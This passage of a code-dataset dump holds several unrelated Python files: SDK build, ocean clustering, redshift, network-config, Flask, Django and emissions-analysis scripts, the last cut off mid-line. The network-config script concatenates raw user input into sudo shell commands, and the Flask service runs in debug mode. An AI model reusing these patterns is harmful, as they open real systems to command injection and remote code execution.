parser.add_option(\"--Nr64\",\n help=\"Omit the release 64-bit binaries from the SDK\",\n dest=\"release64\", action=\"store_false\")\n parser.add_option(\"--Nd64\",\n help=\"Omit the debug 64-bit binaries from the SDK\",\n dest=\"debug64\", action=\"store_false\")\n parser.set_defaults(ms_help_compiler=ms_help_compiler_path,\n release32=True, debug32=True,\n release64=True, debug64=True)\n parser.add_option(\"-q\", \"--quiet\", help=\"Print fewer messages\",\n action=\"store_const\", dest=\"verbosity\", const=0)\n parser.add_option(\"-v\", \"--verbose\", help=\"Print more messages\",\n action=\"store_const\", dest=\"verbosity\", const=2)\n parser.set_defaults(verbosity=1)\n\n #Parse the optional arguments, plus any additional arguments present\n #after optional arguments\n options = parser.parse_args(args[1:])[0]\n if not(is_windows()):\n options.ms_help_compiler = None\n options.release32 = None\n options.debug32 = None\n options.release64 = None\n options.debug64 = None\n\n return options\n\ndef main(args):\n options = parse_args(args)\n try:\n if options.opticks_code_dir is None:\n if \"OPTICKS_CODE_DIR\" in os.environ:\n options.opticks_code_dir = os.environ[\"OPTICKS_CODE_DIR\"]\n else:\n raise ScriptException(\"The path to the Opticks \"\\\n \"source code was not provided, see -c or --code-dir\")\n\n if not(os.path.exists(options.opticks_code_dir)):\n raise ScriptException(\"The path to the Opticks source \"\\\n \"code does not exist %s, see -c or --code-dir\")\n\n sys.path.append(options.opticks_code_dir)\n import commonutils\n #the previous import line, only imports local to this function\n #so push import to global scope.\n globals()[\"commonutils\"] = commonutils\n\n create_toolkit_zip(options.opticks_code_dir, options.dependencies,\n options.package_dir, options.ms_help_compiler,\n options.release32, options.debug32, options.release64,\n options.debug64, options.verbosity)\n except Exception as e:\n print(\"--------------------------\")\n traceback.print_exc()\n print(\"--------------------------\")\n return 2000\n return 0\n\n#Main execution path when script is run\nif __name__ == \"__main__\":\n #sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)\n retcode = main(sys.argv)\n if retcode != 0:\n print(\"ERROR: Return code is %s\" % (retcode))\n sys.exit(retcode)\n","repo_name":"opticks-org/opticks","sub_path":"Release/Installation/build-toolkit.py","file_name":"build-toolkit.py","file_ext":"py","file_size_in_byte":24338,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"54"} +{"seq_id":"16301067898","text":"from OceanPatternsIndicator.utils.Plotter import Plotter\nimport time\nfrom preprocessing_utils import *\nimport pandas as pd\nimport sklearn\nfrom pyxpcm.models import pcm\n\n\ndef get_args():\n \"\"\"\n Extract arguments from command line\n\n Returns\n -------\n parse.parse_args(): dict of the arguments\n\n \"\"\"\n import argparse\n\n parse = argparse.ArgumentParser(description=\"Ocean patterns method\")\n parse.add_argument('k', type=int, help=\"number of clusters K\")\n parse.add_argument('file_name', type=str, help='input dataset')\n parse.add_argument('var_name_ds', type=str, help='name of variable in dataset')\n parse.add_argument('var_name_mdl', type=str, help='name of variable in model')\n parse.add_argument('algo', type=str, help='algo choice (Kmean, mini-batch, GMM')\n return parse.parse_args()\n\n\ndef train_model(k, x, var_name_ds, algo):\n if algo == \"kmean\":\n print(\"model used: kmean\")\n model = sklearn.cluster.KMeans(n_clusters=k, n_init=10, max_iter=1000)\n elif algo == \"batch\":\n print(\"model used: mini batch kmean\")\n model = sklearn.cluster.MiniBatchKMeans(n_clusters=k, n_init=10, max_iter=1000, batch_size=100)\n else:\n print(\"model used: GMM\")\n model = sklearn.mixture.GaussianMixture(n_components=k, max_iter=1000, tol=1e-6)\n model.fit(x[var_name_ds])\n return model\n\n\ndef predict(x, m, var_name_ds, k, var_predict):\n classif = m.predict(x[var_predict])\n x = x.assign(variables={\"labels\": ('sample_dim', classif)})\n q = [0.05, 0.5, 0.95]\n x = compute_quantile(x, var_name_ds, k, q)\n x = x.assign_coords(coords={'k': range(k)})\n x = x.unstack('sample_dim')\n return x\n\n\ndef generate_plots(ds, var_name_ds, k, algorithm):\n \"\"\"\n Generates and saves the following plots:\n - vertical structure: vertical structure of each classes. It draws the mean profile and the 0.05 and 0.95 quantiles\n - vertical structure comp: vertical structure graph but Quantiles are being plotted together to highlight\n differences between classes.\n - Spacial distribution: plot the PCM labels in a map to analyse the spatial coherence of classes.\n - Robustness: spacial distribution of a scaled probability of a profile to belong to a class.\n - Pie chart: pie chart showing the percentage of profiles belonging to each class and the number of\n classified profiles.\n - Temporal distribution by month: The bar plots represents the percentage of profiles in each class by month.\n - Temporal distribution by season: The bar plots represents the percentage of profiles in each class by season.\n Parameters\n ----------\n ds : Xarray dataset containing the predictions\n var_name_ds : name of the variable in the dataset\n\n Returns\n -------\n saves all the plots as png\n \"\"\"\n try:\n x_label = ds[var_name_ds].attrs['long_name'] + \" in \" + ds[var_name_ds].attrs['unit_long']\n except KeyError:\n x_label = var_name_ds\n\n # create a pyXpcm model to use the Plotter class\n var_name_mdl = var_name_ds\n z_dim = 'depth'\n z = ds[z_dim]\n pcm_features = {var_name_mdl: z}\n m = pcm(K=k, features=pcm_features)\n ds = ds.rename({'labels': 'PCM_LABELS'})\n ds = ds.sortby('latitude').sortby('longitude')\n P = Plotter(ds, m, coords_dict={'latitude': 'latitude', 'longitude': 'longitude', 'time': 'time', 'depth': 'depth'})\n\n # plot profiles by class\n P.vertical_structure(q_variable=var_name_ds + '_Q', sharey=True, xlabel=x_label)\n P.save_BlueCloud('vertical_struc.png')\n # plot profiles by quantile\n P.vertical_structure_comp(q_variable=var_name_ds + '_Q', plot_q='all', xlabel=x_label)\n P.save_BlueCloud('vertical_struc_comp.png')\n # spacial distribution\n P.spatial_distribution(time_slice='most_freq_label')\n P.save_BlueCloud('spatial_distr_freq.png')\n # robustness\n # P.plot_robustness(time_slice=first_date)\n # P.save_BlueCloud('robustness.png')\n # pie chart of the classes distribution\n P.pie_classes()\n P.save_BlueCloud('pie_chart.png')\n # temporal distribution (monthly)\n P.temporal_distribution(time_bins='month')\n P.save_BlueCloud('temporal_distr_months.png')\n # temporal distribution (seasonally)\n P.temporal_distribution(time_bins='season')\n P.save_BlueCloud('temporal_distr_season.png')\n # save data\n ds.to_netcdf('predicted_dataset.nc', format='NETCDF4')\n\n\ndef main():\n args = get_args()\n var_name_ds = args.var_name_ds\n var_name_mdl = args.var_name_mdl\n algorithm = args.algo\n k = args.k\n file_name = args.file_name\n exec_time_log = []\n for i in range(10):\n print(\"loading the dataset\")\n start_time = time.time()\n x = preprocessing_allin(path=file_name, scaling=True, multiple=False, backend='sk', var_name=var_name_ds)\n load_time = time.time() - start_time\n print(\"load finished in \" + str(load_time) + \"sec\")\n print(\"starting computation\")\n start_time = time.time()\n m = train_model(k=k, x=x, var_name_ds=var_name_ds + \"_scaled_reduced\", algo=algorithm)\n train_time = time.time() - start_time\n print(\"training finished in \" + str(train_time) + \"sec\")\n start_time = time.time()\n ds = predict(m=m, x=x, var_name_ds=var_name_ds, var_predict = var_name_ds + \"_scaled_reduced\", k=k)\n prediction_time = time.time() - start_time\n print(\"prediction finished in \" + str(prediction_time) + \"sec\")\n start_time = time.time()\n generate_plots(ds=ds, var_name_ds=var_name_ds, k=k, algorithm=algorithm)\n plot_time = time.time() - start_time\n print(\"plot finished in \" + str(plot_time) + \"sec\")\n tmp_log = {\n 'exec_nb': i,\n 'ncpu': 8,\n 'ram': 16,\n 'algorithm': algorithm,\n 'platform': \"Datarmor\",\n 'time_load': load_time,\n 'time_train': train_time,\n 'time_prediction': prediction_time,\n 'time_plot': plot_time,\n 'total_time': load_time + train_time + prediction_time + plot_time,\n 'file_size': (ds.nbytes / 1073741824),\n }\n exec_time_log.append(tmp_log)\n pd.DataFrame(exec_time_log).to_csv(\"exec_time.csv\")\n print(\"exec time saved\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"euroargodev/BlueCloud","sub_path":"speed_test/GMM_kmean.py","file_name":"GMM_kmean.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36010278132","text":"from aart_func import *\nfrom params import * \n\nprint(\"Computing the redshift factor at each point in the image plane \\n\")\n\nfnbands=path+\"LensingBands_a_%s_i_%s.h5\"%(spin_case,i_case)\n\nprint(\"Reading file: \",fnbands)\n\nh5f = h5py.File(fnbands,'r')\n\nsupergrid0=h5f['grid0'][:]\nmask0=h5f['mask0'][:]\nN0=int(h5f[\"N0\"][0])\n\nsupergrid1=h5f['grid1'][:]\nmask1=h5f['mask1'][:]\nN1=int(h5f[\"N1\"][0])\n\t\nsupergrid2=h5f['grid2'][:]\nmask2=h5f['mask2'][:]\nN2=int(h5f[\"N2\"][0])\n\nh5f.close()\n\nfnbands=path+\"Rays_a_%s_i_%s.h5\"%(spin_case,i_case)\n\nprint(\"Reading file: \",fnbands)\n\nh5f = h5py.File(fnbands,'r')\n\nrs0=h5f['rs0'][:]\nsign0=h5f['sign0'][:]\n#t0=h5f['t0'][:]\nphi0=h5f['phi0'][:]\n\nrs1=h5f['rs1'][:]\nsign1=h5f['sign1'][:]\n#t1=h5f['t1'][:]\nphi1=h5f['phi1'][:]\n\nrs2=h5f['rs2'][:]\nsign2=h5f['sign2'][:]\n#t2=h5f['t2'][:]\nphi2=h5f['phi2'][:]\n\nh5f.close()\n\n\ni_g0 = obsint.gfactorf(supergrid0,mask0,sign0,spin_case,isco,rs0,phi0,thetao)\ni_g1 = obsint.gfactorf(supergrid1,mask1,sign1,spin_case,isco,rs1,phi1,thetao)\ni_g2 = obsint.gfactorf(supergrid2,mask2,sign2,spin_case,isco,rs2,phi2,thetao)\n\ni_g0 = (i_g0).reshape(N0,N0).T\ni_g1 = (i_g1).reshape(N1,N1).T\ni_g2 = (i_g2).reshape(N2,N2).T\n\nfilename=path+\"gfactors_a_%s_i_%s.h5\"%(spin_case,i_case)\n\nh5f = h5py.File(filename, 'w')\nh5f.create_dataset('gs0', data=i_g0)\nh5f.create_dataset('gs1', data=i_g1)\nh5f.create_dataset('gs2', data=i_g2)\n\nh5f.close()\n","repo_name":"iAART/aart","sub_path":"gfactor.py","file_name":"gfactor.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"36024669626","text":"#!/usr/bin/python\n\n############################\n# Librairies import\n############################\nimport os\n\nimport checkUserInput\n\n############################\n# Functions\n############################\ndef set_nic_settings(aftr, countryCode):\n\ttry:\n\t\tcommand = \"sudo netmgr -i country_code set:\" + countryCode\n\t\tp = os.system(command)\n\t\tprint(p)\n\texcept:\n\t\tprint(\"Le country code n'a pas pu etre configure!\")\n\n\ttry:\n\t\tcommand = \"sudo netmgr -i iotr aftr_address set \" + aftr\n\t\tp = os.system(command)\n\t\tprint(p)\n\texcept:\n\t\tprint(\"L'aftr n'a pas pu etre configure!\")\n\ndef get_nic_settings():\n\tcountryCode = 0\n\taftr = \"\"\n\n\twhile True:\n\t\ttry:\n\t\t\tcountryCode = int(input(\"Encodez le country code: \"))\n\t\t\tquestion = \"Validez-vous le country code \" + str(countryCode) + \" ?\\n[Y]: Oui\\n[n]: Non\\n[exit]: Quitter le programme\\nReponse: \"\n\n\t\t\tif checkUserInput.question_and_verification(question) == \"y\":\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Le country code n'a pas ete valide! Veuillez en encoder un nouveau!\")\n\t\texcept:\n\t\t\tprint(\"Le country code n'est pas valide!\")\n\n\twhile True:\n\t\taftr = input(\"Encodez l'AFTR: \")\n\t\tquestion = \"Validez-vous l'AFTR \" + aftr + \" ?\\n[Y]: Oui\\n[n]: Non\\n[exit]: Quitter le programme\\nReponse:\"\n\n\t\tif checkUserInput.question_and_verification(question) == \"y\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"L'AFTR n'a pas ete validee! Veuillez en encoder une nouvelle!\")\n\n\tset_nic_settings(aftr, countryCode)\n","repo_name":"BertrandKevin/Configuration-Folder","sub_path":"src/configureNic.py","file_name":"configureNic.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1419732348","text":"\nclass InvalidColorError (Exception):\n def __init__(self, message):\n super().__init__(message)\n\n\nclass ANSI:\n COLOR_ANSI = {\n 'white': '\\u001b[37m',\n 'grey': '\\u001b[38;5;243m',\n 'darkgrey': '\\u001b[38;5;233m',\n 'black': '\\u001b[30m',\n 'red': '\\u001b[31m',\n 'green': '\\u001b[32m',\n 'yellow': '\\u001b[33m',\n 'blue': '\\u001b[34m',\n 'magenta': '\\u001b[35m',\n 'cyan': '\\u001b[36m',\n 'orange': '\\u001b[38;5;208m',\n 'darkorange': '\\u001b[38;5;130m',\n 'darkgreen': '\\u001b[38;5;28m',\n 'purple': '\\u001b[38;5;92m',\n }\n\n RESET_ANSI = '\\u001b[0m'\n\n def get_color_ansi(color_name):\n if color_name in ANSI.COLOR_ANSI:\n return ANSI.COLOR_ANSI[color_name]\n else:\n raise InvalidColorError(f'color name: \"{color_name}\" is invalid')\n\n def reset_after_use(text):\n return f'{ANSI.RESET_ANSI}{text}{ANSI.RESET_ANSI}'\n","repo_name":"jampen/beautiful","sub_path":"src/ansi.py","file_name":"ansi.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17885233109","text":"#!/usr/bin/python\nfrom flask import Flask, request, jsonify, abort\nimport os\nimport ConfigParser\nimport multiprocessing\nimport atexit\nimport Bundle\n\ncurrentAppDir = os.path.dirname(__file__)\n\nconfigParser = ConfigParser.RawConfigParser()\nconfigParser.read( os.path.join( currentAppDir, 'analyser.cfg' ) )\n\ng_app = Flask(__name__, static_folder='', static_url_path='')\n\n\n# Pool for analysing jobs \ng_pool = multiprocessing.Pool(processes=4)\ng_sharedBundleDatas = {}\ng_enablePool = True\n\n# Manager to share analysing information\ng_manager = multiprocessing.Manager()\n\n@g_app.route('/', methods=['GET'])\ndef index():\n return \"Analyser service v1.0\"\n\n@g_app.route('/bundle/<bundleId>', methods=['POST'])\ndef analyseBundle(bundleId):\n '''\n Apply a pool of process to analyse bundles asynchronously.\n '''\n global g_sharedBundleDatas, g_pool, g_enablePool\n\n bundleBin = request.data\n bundleExt = request.headers.get('Content-Type')\n\n datas = g_sharedBundleDatas[bundleId] = g_manager.dict()\n\n datas['status'] = \"waiting\"\n datas['analyse'] = \"waiting\"\n datas['extraction'] = \"waiting\"\n datas['datas'] = None\n\n if g_enablePool:\n g_pool.apply(Bundle.launchAnalyse, args=[datas, bundleExt, bundleBin, bundleId])\n else:\n Bundle.launchAnalyse(datas, bundleExt, bundleBin, bundleId)\n\n return jsonify(**datas)\n\n@g_app.route('/bundle/<bundleId>', methods=['GET'])\ndef getStatus(bundleId):\n '''\n Return the analyse status.\n '''\n global g_sharedBundleDatas\n if bundleId not in g_sharedBundleDatas:\n g_app.logger.error('the id ' + bundleId + ''' doesn't exist''')\n abort (404)\n\n return jsonify(**g_sharedBundleDatas[bundleId])\n\n@atexit.register\ndef quit():\n '''\n Close processes and quit pool at exit.\n '''\n global g_pool\n g_pool.close()\n g_pool.terminate()\n g_pool.join()\n\nif __name__ == '__main__':\n g_app.run(host=configParser.get('APP_ANALYSER', 'host'), port=configParser.getint('APP_ANALYSER', 'port'), debug=True)\n","repo_name":"mguiral/ShuttleOFX","sub_path":"analyser/runAnalyser.py","file_name":"runAnalyser.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"30892892201","text":"from unittest import result\nfrom colorama import Cursor\nfrom django.shortcuts import redirect, render\nfrom Product.models import *\nfrom django.db import connection\n\n# Create your views here.\n\ndef home(request):\n if request.method == 'POST':\n string = request.POST.get('search')\n return redirect(search_view, string=string)\n else:\n all_products = Product.objects.all()\n print('Hello')\n return render(request, 'Home/home.html', {'all_products': all_products})\n\ndef search_view(request,string):\n if string is not None and string != '':\n all_products = Product.objects.filter(name__contains=string)\n else:\n all_products = Product.objects.all()\n return render(request, 'Home/search_result.html', {'all_products': all_products})","repo_name":"munim110/Sample-Ecommerce-Site-","sub_path":"Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14204202141","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\ndef process(cname, pname):\n bazel_build = \"bazel build //\" + cname + \":\"+ pname\n os.system(bazel_build)\n print(\"\\n~~~ bin start ~~~\")\n bazel_bin = \"./bazel-bin/\" + cname + \"/\" + pname\n os.system(bazel_bin)\n print(\"~~~ bin end ~~~\\n\")\n os.system(\"bazel clean\")\n\n\ndef p02():\n r = 100.0 * (85 - 72) / 85\n print(f\"hello, the percentage is {r:.1f}\")\n\nscript, cname, pname = sys.argv\n\nif int(cname) < 10:\n cname = \"0\" + cname\nif int(pname) < 10:\n pname = \"0\" + pname\n\ncname = \"c\" + cname\npname = \"p\" + pname\nprocess(cname, pname)\n","repo_name":"weiweitong/system","sub_path":"linux/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2126314585","text":"# imports\r\n#region\r\nimport os\r\nimport pyreadstat\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom statsmodels.stats.weightstats import DescrStatsW\r\nfrom sklearn.linear_model import LinearRegression\r\nimport statsmodels.api as sm\r\nimport statsmodels.formula.api as smf\r\nimport seaborn as sns\r\nimport matplotlib as mpl\r\nmpl.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nfrom libs.utils import *\r\nfrom libs.plots import *\r\nfrom libs.extensions import *\r\nplt.ioff()\r\n#endregion\r\n\r\n\r\n# RESPEKT - datove podklady ---\r\n\r\nroot = 'D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\111-emise-svet-srovnani\\\\data'\r\n\r\ndf = pd.read_csv(f'{root}\\\\data_all_w_edgar50.csv')\r\ndf.dtypes\r\n\r\ndf['edgar50_co2'] = df['edgar50_CO2_excl_short-cycle_org_C']\r\ndf['edgar50_co2_w_short'] = df['edgar50_co2'] + df['edgar50_CO2_org_short-cycle_C']\r\n# I am using the new sensitivities here, 28 and 265\r\ndf['edgar50_co2eq'] = df['edgar50_CO2_excl_short-cycle_org_C'] + 28 * df['edgar50_CH4'] + 265 * df['edgar50_N2O']\r\n# df['edgar50_co2eq'] = df['edgar50_CO2_excl_short-cycle_org_C'] + 25 * df['edgar50_CH4'] + 298 * df['edgar50_N2O']\r\ndf['edgar50_co2eq_w_short'] = df['edgar50_co2eq'] + df['edgar50_CO2_org_short-cycle_C']\r\n\r\ndf.query('year == 2015')['edgar50_co2eq'].sum() / 1e6\r\ndf.query('year == 2015')['edgar50_co2'].sum() / 1e6\r\n\r\ndata = df[['code', 'year', 'SP.POP.TOTL', 'NY.GDP.MKTP.PP.KD', 'edgar50_co2eq', 'edgar50_CO2_excl_short-cycle_org_C',\r\n 'edgar50_CH4', 'edgar50_N2O', 'edgar50_co2eq_w_short', 'edgar50_co2_w_short']] \\\r\n .rename(columns={'year': 'year_data', 'SP.POP.TOTL': 'pop', 'NY.GDP.MKTP.PP.KD': 'gdp', 'edgar50_co2eq': 'co2eq',\r\n 'edgar50_CO2_excl_short-cycle_org_C': 'co2', 'edgar50_CH4': 'ch4', 'edgar50_N2O': 'n2o',\r\n 'edgar50_co2eq_w_short': 'co2eq_w_short', 'edgar50_co2_w_short': 'co2_w_short'})\r\n\r\ndata['year_data'] = np.int_(data['year_data'])\r\n\r\nvars = ['pop', 'gdp', 'co2']\r\nd18 = data.dropna(subset=vars)\r\nvars15 = ['pop', 'gdp', 'co2', 'ch4', 'n2o', 'co2eq', 'co2eq_w_short']\r\nd15 = data.dropna(subset=vars15)\r\n\r\ncodes = pd.DataFrame({'code': np.sort(data['code'].unique())})\r\ncodes['year'] = np.int_(2018)\r\n\r\ncodes15 = pd.DataFrame({'code': np.sort(data['code'].unique())})\r\ncodes15['year'] = np.int_(2015)\r\n\r\nd18 = pd.merge_asof(codes, d18.sort_values('year_data'), by='code', left_on='year', right_on='year_data')\r\nd15 = pd.merge_asof(codes15, d15.sort_values('year_data'), by='code', left_on='year', right_on='year_data')\r\ncountries = pd.read_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\emission-intensity\\\\countries.csv')\r\ncountries = countries.rename(columns={'country_name': 'country', 'final_region': 'cont', 'final_region_en': 'cont_en',\r\n 'second_chart_region': 'region'}).drop(columns=['world_bank_region', 'wiki_region', 'final_region_full'])\r\ncountries.show_csv()\r\n\r\nd18 = pd.merge(d18, countries, how='inner')\r\nd15 = pd.merge(d15, countries, how='inner')\r\n\r\n# full edgar\r\n8710 * 265 + 369341.8 * 28 + 36311982 # 48.96 Gt\r\n\r\n# all aviation\r\n0.924726 / 48.96\r\n0.924726 / 36\r\n\r\n0.867139 / 49\r\n\r\n# SEA + AIR (roughly 60 % sea, 40 % air)\r\n117.4 * 265 + 503 * 28 + 1187011 # 1.23 Gt\r\n\r\n0.6 / 50\r\n\r\n16.2\r\n11.1 / 16.2\r\n\r\n0.6 * 16.2\r\n\r\n1.4 / 11.1\r\n\r\n194\r\n128\r\n128 / 194\r\n0.6 * 194\r\n(128 - 0.6 * 194) / 128\r\n\r\n(194 + 116) / 2\r\n\r\n160 / 194\r\n\r\n\r\nd18.to_parquet('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d18.parquet')\r\nd15.to_parquet('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d15.parquet')\r\n\r\nd18 = d18.dropna(subset=vars)\r\nd18['year_data'] = np.int_(d18['year_data'])\r\nd15 = d15.dropna(subset=vars15)\r\nd15['year_data'] = np.int_(d15['year_data'])\r\n\r\nd15['short_ratio'] = d15['co2eq_w_short'] / d15['co2eq']\r\n\r\nd15.show_csv()\r\n\r\nd15.co2.sum() / 1e6\r\nd15.co2eq.sum() / 1e6\r\nd15.co2_w_short.sum() / 1e6\r\nd15.co2eq_w_short.sum() / 1e6\r\nd15['pop'].sum() / 1e9\r\n\r\n0.6 / 40\r\n\r\nd18.show_csv()\r\n\r\nd15['pop'].sum()\r\nd18['pop'].sum()\r\n\r\nconts = countries[['region', 'cont', 'cont_en']].drop_duplicates().dropna().reset_index(drop=True)\r\nconts.show_csv()\r\n\r\nd15.show_csv()\r\n\r\nd15_agg = d15.groupby('region')[['pop', 'co2eq', 'gdp']].sum().reset_index()\r\nd15_agg['co2eq_per_pop'] = d15_agg.eval('1000 * co2eq / pop')\r\nd15_agg['co2eq_per_gdp'] = d15_agg.eval('1000000000 * co2eq / gdp')\r\n\r\nd18_agg = d18.groupby('region')[['pop', 'co2', 'gdp']].sum().reset_index()\r\nd18_agg['co2_per_pop'] = d18_agg.eval('1000 * co2 / pop')\r\nd18_agg['co2_per_gdp'] = d18_agg.eval('1000000000 * co2 / gdp')\r\n\r\nd18_agg.to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d18_agg.csv', index=False)\r\nd15_agg.to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d15_agg.csv', index=False)\r\n\r\n\r\nd15['co2eq_per_pop'] = d15.eval('1000 * co2eq / pop')\r\nd15['co2eq_per_gdp'] = d15.eval('1000000000 * co2eq / gdp')\r\n\r\nd18['co2_per_pop'] = d18.eval('1000 * co2 / pop')\r\nd18['co2_per_gdp'] = d18.eval('1000000000 * co2 / gdp')\r\n\r\ncols = ['code', 'country', 'year', 'year_data', 'pop', 'gdp']\r\nd18[cols + ['co2', 'co2_per_pop', 'co2_per_gdp']] \\\r\n .to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d18_countries.csv', index=False)\r\nd15[cols + ['co2eq', 'co2eq_per_pop', 'co2eq_per_gdp']] \\\r\n .to_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\respekt-data\\\\d15_countries.csv', index=False)\r\n\r\nd15.query('co2eq_per_pop > 12.2') # 28th\r\nd18.query('co2_per_pop > 10.5') # 21st\r\n\r\n\r\nd15_agg.show_csv()\r\n\r\n# PER CAPITA ---\r\nd15_pop = d15_agg.sort_values('co2eq_per_pop', ascending=False).reset_index(drop=True)\r\nd15_pop['start'] = d15_pop['pop'].cumsum().shift(1)\r\nd15_pop.loc[0, 'start'] = 0\r\nd15_pop['end'] = d15_pop['pop'].cumsum()\r\n\r\nd18_pop = d18_agg.sort_values('co2_per_pop', ascending=False).reset_index(drop=True)\r\nd18_pop['start'] = d18_pop['pop'].cumsum().shift(1)\r\nd18_pop.loc[0, 'start'] = 0\r\nd18_pop['end'] = d18_pop['pop'].cumsum()\r\n\r\n# charts\r\n\r\nplt.rcParams['figure.figsize'] = 12, 7\r\n\r\nfig15pop, ax15pop = plt.subplots()\r\npatches = []\r\nfor i in d15_pop.index:\r\n plt.text(d15_pop['end'].loc[i] + i * 6e6 + 2e7 - 0.5 * d15_pop['pop'].loc[i], d15_pop['co2eq_per_pop'].loc[i] + 0.4,\r\n d15_pop['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((d15_pop['start'].loc[i] + i * 6e6, 0), d15_pop['pop'].loc[i],\r\n d15_pop['co2eq_per_pop'].loc[i])\r\n patches.append(rec)\r\n\r\nax15pop.add_collection(mpl.collections.PatchCollection(patches))\r\nax15pop.set(xlim=(0, 8e9), ylim=(0, 36))\r\nax15pop.set(xlabel='Population', ylabel='t CO2eq per capita', title='CO2eq emissions per capita (2015)')\r\n\r\nfig18pop, ax18pop = plt.subplots()\r\npatches = []\r\nfor i in d18_pop.index:\r\n plt.text(d18_pop['end'].loc[i] + i * 6e6 + 2e7 - 0.5 * d18_pop['pop'].loc[i], d18_pop['co2_per_pop'].loc[i] + 0.4,\r\n d18_pop['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((d18_pop['start'].loc[i] + i * 6e6, 0), d18_pop['pop'].loc[i],\r\n d18_pop['co2_per_pop'].loc[i])\r\n patches.append(rec)\r\n\r\nax18pop.add_collection(mpl.collections.PatchCollection(patches))\r\nax18pop.set(xlim=(0, 8e9), ylim=(0, 36))\r\nax18pop.set(xlabel='Population', ylabel='t CO2 per capita', title='CO2 emissions per capita (2018)')\r\n\r\n# PER GDP ---\r\nd15_gdp = d15_agg.sort_values('co2eq_per_gdp', ascending=False).reset_index(drop=True)\r\nd15_gdp['start'] = d15_gdp['gdp'].cumsum().shift(1)\r\nd15_gdp.loc[0, 'start'] = 0\r\nd15_gdp['end'] = d15_gdp['gdp'].cumsum()\r\nfor x in ['gdp', 'start', 'end']:\r\n d15_gdp[x] = d15_gdp[x] / 1e9\r\n\r\nd18_gdp = d18_agg.sort_values('co2_per_gdp', ascending=False).reset_index(drop=True)\r\nd18_gdp['start'] = d18_gdp['gdp'].cumsum().shift(1)\r\nd18_gdp.loc[0, 'start'] = 0\r\nd18_gdp['end'] = d18_gdp['gdp'].cumsum()\r\nfor x in ['gdp', 'start', 'end']:\r\n d18_gdp[x] = d18_gdp[x] / 1e9\r\n\r\nd15_gdp.show_csv()\r\n\r\nfig15gdp, ax15gdp = plt.subplots()\r\npatches = []\r\nfor i in d15_gdp.index:\r\n plt.text(d15_gdp['end'].loc[i] + i * 2e2 + 5e2 - 0.5 * d15_gdp['gdp'].loc[i], d15_gdp['co2eq_per_gdp'].loc[i] + 0.4,\r\n d15_gdp['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((d15_gdp['start'].loc[i] + i * 2e2, 0), d15_gdp['gdp'].loc[i],\r\n d15_gdp['co2eq_per_gdp'].loc[i])\r\n patches.append(rec)\r\n\r\nax15gdp.add_collection(mpl.collections.PatchCollection(patches))\r\nax15gdp.set(xlim=(0, 1.2e5), ylim=(0, 1200))\r\nax15gdp.set(xlabel='GDP PPP (const intl $, billion)', ylabel='g CO2eq per $', title='CO2eq emissions per GDP (2015)')\r\n\r\nfig18gdp, ax18gdp = plt.subplots()\r\npatches = []\r\nfor i in d18_gdp.index:\r\n plt.text(d18_gdp['end'].loc[i] + i * 2e2 + 5e2 - 0.5 * d18_gdp['gdp'].loc[i], d18_gdp['co2_per_gdp'].loc[i] + 0.4,\r\n d18_gdp['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((d18_gdp['start'].loc[i] + i * 2e2, 0), d18_gdp['gdp'].loc[i],\r\n d18_gdp['co2_per_gdp'].loc[i])\r\n patches.append(rec)\r\n\r\nax18gdp.add_collection(mpl.collections.PatchCollection(patches))\r\nax18gdp.set(xlim=(0, 1.3e5), ylim=(0, 1000))\r\nax18gdp.set(xlabel='GDP PPP (const intl $, billion)', ylabel='g CO2 per ', title='CO2 emissions per GDP (2018)')\r\n\r\n# ax18gdp.show()\r\n\r\nChart([ax15pop, ax18pop, ax15gdp, ax18gdp]).show()\r\n\r\n\r\n\r\n\r\n\r\n\r\nfig, ax = plt.subplots()\r\npatches = []\r\n\r\nfor i in df.index:\r\n plt.text(df['end'].loc[i] + i * 1e7 + 2e7 - 0.5 * df['pop'].loc[i], df['co2_per_capita'].loc[i] + 0.4,\r\n df['region'].loc[i], rotation=45)\r\n rec = mpl.patches.Rectangle((df['start'].loc[i] + i * 1e7, 0), df['pop'].loc[i],\r\n df['co2_per_capita'].loc[i])\r\n patches.append(rec)\r\n\r\nax.add_collection(mpl.collections.PatchCollection(patches))\r\nax.set(xlim=(0, 7.5e9), ylim=(0, 